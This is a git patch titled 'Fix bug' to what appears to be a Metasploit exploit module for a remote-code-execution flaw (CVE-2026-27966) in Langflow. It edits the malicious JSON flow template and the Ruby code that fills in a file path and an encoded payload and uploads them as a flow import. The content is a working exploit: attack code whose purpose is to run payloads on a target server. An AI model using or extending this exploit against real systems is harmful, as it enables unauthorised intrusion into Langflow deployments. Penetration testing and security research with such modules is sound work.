From 3cfbb90b0f0c2cd930f6c725d032af7cde6a8c7f Mon Sep 17 00:00:00 2001
From: Takah1ro <tkhr.y0k0yama@gmail.com>
Date: Fri, 17 Apr 2026 07:31:25 +0900
Subject: [PATCH] Fix bug

---
 data/exploits/CVE-2026-27966/cve_2026_27966.json          | 8 ++------
 .../exploits/multi/http/langflow_rce_cve_2026_27966.rb    | 3 ++-
 2 files changed, 4 insertions(+), 7 deletions(-)

diff --git a/data/exploits/CVE-2026-27966/cve_2026_27966.json b/data/exploits/CVE-2026-27966/cve_2026_27966.json
index b218bfef04..fa8c60d2b6 100644
--- a/data/exploits/CVE-2026-27966/cve_2026_27966.json
+++ b/data/exploits/CVE-2026-27966/cve_2026_27966.json
@@ -3,7 +3,6 @@
         "edges": [
             {
                 "animated": false,
-                "className": "",
                 "data": {
                     "sourceHandle": {
                         "dataType": "CSVAgent",
@@ -33,7 +32,6 @@
             },
             {
                 "animated": false,
-                "className": "",
                 "data": {
                     "sourceHandle": {
                         "dataType": "LanguageModelComponent",
@@ -61,7 +59,6 @@
             },
             {
                 "animated": false,
-                "className": "",
                 "data": {
                     "sourceHandle": {
                         "dataType": "TextInput",
@@ -102,7 +99,7 @@
                         "custom_fields": {},
                         "description": "Runs a language model given a specified provider.",
                         "display_name": "Language Model",
-                        "documentation": "https://docs.langflow.org/components-models",
+                        "documentation": "",
                         "edited": false,
                         "field_order": [
                             "provider",
@@ -118,7 +115,6 @@
                         ],
                         "frozen": false,
                         "icon": "brain-circuit",
-                        "last_updated": "2026-04-06T03:01:27.454Z",
                         "legacy": false,
                         "metadata": {
                             "dependencies": {
@@ -339,7 +335,7 @@
                                 "advanced": false,
                                 "display_name": "Ollama API URL",
                                 "dynamic": false,
-                                "info": "Endpoint of the Ollama API (Ollama only). Defaults to http://localhost:11434",
+                                "info": "Endpoint",
                                 "input_types": [
                                     "Message"
                                 ],
diff --git a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
index 1a3b6db049..2ff2d79c60 100644
--- a/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
+++ b/modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
@@ -132,11 +132,12 @@ class MetasploitModule < Msf::Exploit::Remote
     exploit_data = exploit_data.gsub('__FOLDERID__', @folder_id)
     exploit_data = exploit_data.gsub('__MODELNAME__', datastore['MODEL'])
     exploit_data = exploit_data.gsub('__OLLAMAAPIURI__', datastore['OLLAMAAPIURI'])
+    exploit_data = exploit_data.gsub('__FILEPATH__', path)
     exploit_data = exploit_data.gsub('__PAYLOAD__', payload.encode)
     exploit_data = exploit_data.gsub('__NAME__', rand_text_alphanumeric(8))
     # construct POST data
     data = Rex::MIME::Message.new
-    data.add_part(exploit_data.to_json, 'application/json', nil, "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
+    data.add_part(exploit_data, 'application/json', nil, "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(3..9)}.json\"")
 
     # Import a flow
     res = send_request_cgi({